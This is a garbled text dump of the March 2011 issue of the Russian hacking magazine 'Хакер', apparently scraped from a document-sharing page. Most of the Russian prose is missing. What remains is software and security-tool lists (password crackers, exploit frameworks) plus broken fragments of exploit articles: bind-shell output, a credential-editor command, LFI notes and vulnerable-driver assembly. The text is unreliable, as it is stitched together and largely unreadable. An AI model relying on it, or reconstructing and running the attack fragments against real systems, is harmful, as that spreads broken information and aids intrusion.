SWIG 2.0.1
Talend Open Studio 4.1.2
>System
AS SSD Benchmark 1.6.4
Bluetooth Driver Installer 1.0.0.62
BootRacer 3.1
CheckDiskGUI 1.1.0
ESET SysInspector 1.2
FreeFileSync 3.13
Immunet Protect FREE Antivirus
JottiQ 1.0.3
Kaspersky Rescue Disk 10
Minimem 2.0
Npackd 1.14.1
OSFClone 1.0.1005
OSFMount V1.4.1005
OSForensics 0.8
Q-Dir 4.46
R.saver 1.0
Rainmeter 2.0
>Security
Adaptive Security Analyzer IIS
Buster Sandbox Analyzer 1.25
drivesploit
FacebookPasswordDecryptor 1.5
HashCompare 1.0
HTTPTunnel 1.2.1
IdaJava 0.3
MagicTree Beta Two
nmap 5.50
OpenFISMA 2.11
OWASP CSRFGuard 3.0.0.336 ALPHA
PacketFu 1.0.0
pyREtic 0.5.1
VIDigger v1.0
VirtualKD 2.5.1
Ekahau HeatMapper 1.1.2

LogMeIn Hamachi
NetworkMiner 1.0
Pamela Call Recorder 4.7
RoboForm 7.2.0
torchat 0.9.9
TYPO3Winstaller 4.5.0
WebSite-Watcher 2011 (11.0)
>Server
Apache 2.2.17
BIND 9.7.2-P3
Cassandra 0.7
Cherokee 1.0.18
CUPS 1.4.6
DHCP 4.2.0-P2
Drizzle 2011.02.09
MySQL 5.5.8
>Security
drivesploit
Inguma v.0.2
MagicTree Beta Two
Nchop v0.2
nmap 5.50
OpenDLP 0.2.5
OpenFISMA 2.11
OpenSCAP Project 0.6.7
OWASP CSRFGuard 3.0.0.336 ALPHA
PacketFu 1.0.0
pyREtic 0.5.1
Rootkit Hunter 1.3.8
THC-Hydra 6.0
THC-IPV6 1.4
Cross_fuzz
Digital Forensics Framework 0.9
Guardog 0.91
Inguma 0.2
Kismet 2011-01-R1
Linux Security Checklist Tool 2.0.3
Malmon Detection Tool 0.3
Mantra Security Toolkit
Marvin 0.9
Mausezahn 0.40
Nmap 5.50
NMapSi4 0.2.1
Packet Fence 2.0.1
Puck
QuickRecon 0.1.1
THC-Hydra 6.1
XSS Rays 1.0
>Net
CenterIM 4.22.10
Choqok 1.0
Frostwire 4.21.3
Google Chrome 8.0.552.237
I2P 0.8.3
Kfilebox 0.4.7
Lynx 2.8.7
Mozilla Firefox 3.6.13
msmtp 1.4.23
Naim 0.11.8.3.2
NcFTP 3.2.5
Newsbeuter 2.4
Opera 11.00
Psi 0.14
RoundCube Webmail 0.5
Twyt 0.9.2
Vuze 4.6
WeeChat 0.3.4
>Games
PokerTH 0.8.2
>>MAC
AppCleaner 1.2.2
Candybar 3.2.2
Daisy Disk 2.0.5
FreeGuide 0.11
iMedia Browser 2.0
LiteIcon 1.3.1
LittleIpsum 1.1.2
MiroVideoConverter 2.4
Pixelmator 1.6.4
Punto Switcher 3.1.1
RapidWeaver 5
Reeder 1.0b9
Screenography 1.0.15
SecondBar 9.68
SecureFiles 1.1.2
Sigma Chess 6.2
SiteSucker 2.2.3
TinkerTool 4.4
WeatherDock 2.5.1
>X-distr
Debian 6.0 Squeeze
>System
ATI Catalyst 11.1
Capivara 0.8.9
Create Synchronicity 5.1
Dmidecode 2.11
GConf 2.32
Kdf 4.0.5
Linux Kernel 2.6.37
LVM2 2.02.81
nVidia 260.19.36
Palimpsest 2.32
phpVirtualBox 4.2
PowerTop 1.13
Virtual Machine Manager 0.8.6
VirtualBox 4.0.2
xSMBrowser 3.4.0
OpenLDAP 2.4.23
OpenSSH 5.6
OpenVPN 2.1.4
Postfix 2.8.0
PostgreSQL 9.0.3
Samba 3.5.6
Sendmail 8.14.4
Squid 3.1.10
Unbound 1.4.8
Vsftpd 2.3.2
03(146) 2011
. 22
. 28
. 44

WINDOWS

: 2
10
.
MySQL

HACKQUEST 2010
RETURN-ORIENTED ROOTKITS
NAS

APPLESCRIPT
PYTHON
03 (146) 2011
PALEVO: C . 74
UNITS
HTTP://WWW2
JavaScript-
ONLINE DATABASE
SCHEMA
DESIGNER
dbdsgnr.appspot.com
JAVASCRIPT UNPACKER
AND
BEAUTIFIER
jsbeautifier.org
, .
, .
, Python Google App Engine, .
, ,
,
PostgreSQL, SQLite, MySQL, MSSQL Oracle.
JavaScript , ,
-, . WWW2
- JScrambler, . JSBeautifier, ,
JS- ,
,
.

IM Skype
BAMBUSER
bambuser.com
SIMKL
simkl.com
:
? ,
/? :). , 3 000
, Wi-Fi . ,
? Bambuser.
( Windows Mobile, Android, iOS, Symbian, Bada),
Bambuser.
.
, - GTalk
IM-, . .
Simkl, . ,
, QIP, Miranda,
Pidgin .
Skype ( SkypeIn SkypeOut),
.
144
X 03 /146/ 2011
>> coding
3 -
: 12 , 6
3 .
, ? ? .
- .

Хакер 2011 03 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2011 03 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

x 03 (146) 2011

.: (495) 935-7034, : (495) 545-0906

51,8% Android 2.2

WINSTON FREEDOM MUSIC

: Intel Core 2 Duo E4700

NAS : Network Attached Storage

: CIFS/SMB, FTP, UPnP, http

: CIFS/SMB, FTP, UPnP, http, AFP, NFS,

:CIFS/SMB, FTP, UPnP, http, AFP, NFS,

: CIFS/SMB, FTP, UPnP, http, AFP, NFS,

Synology Disk Station DS411+

, , Synology Disk Station DS411+

: CIFS/SMB, FTP, UPnP, http, AFP, NFS,

: CIFS/SMB, FTP, http, AFP, NFS, DLNA,

, Synology Disk Station DS410j , USB

INTEL NAS PERFORMANCE TOOLKIT, RAID 0

File copy from NAS

File copy to NAS

QNAP TS-459 Pro Synology Disk Station DS411+

INTEL NAS PERFORMANCE TOOLKIT, RAID 5

File copy from NAS

File copy to NAS

Memoryze Audit Viewer

XX 0013 (/114446)/ 22001111

op, fp, ufp ,

wce s <, > -c cmd

Help, I need somebody

[+] *** Remote SmbRelay3 BindShell Service Running

TARGETS: Windows XP, 2003, Vista, 2008, 7

TARGETS: Windows XP, 2003, Vista

MS, Fixit-. DLL

Agnitum Outpost Security Suite Pro Agnitum, VBEngNT.sys

Irp = dword ptr 8

vuln_function proc near

, britannica.com/blogs/wp-admin , mlevy X 03 /146/ 2011

What the heck?

AL,BYTE PTR DS:[EDX]

AL,BYTE PTR DS:[ECX]

1. Microsoft Active Directory.

$query = "INSERT INTO indexes (text,source) value

login password admins.

LFI over /var/mail

login password vsmsusers.

2. short_open_tag register_globals ON;

4. MD5- (, PasswordsPro John the Ripper)

: PHP Obfuscator 1.5

d , [eax] * 4 [000424C3A], 06B9700BA

Icon Group String Table`, Palevo

os.execl(origProg, ' ');

$ find ./ -name "*.mp3" -type f -print

3. Bash , , sudo, root'

alias cpr='rsync --progress'

Directory Bookmarks for BASH (dirb.info/bashDirB)

$ cpr file1 file2

How much is the FISH?

2.2, Linux capabilities,

SYSTRACE /SYSJAIL SMP EXPLOIT

, OpenBSD/NetBSD- systrace, 2007

, systrace system call interposition, NetBSD

$ sudo apt-get install build-essential \

sudo apt-get install bzr

2. : mount /dev/sdb1 /media/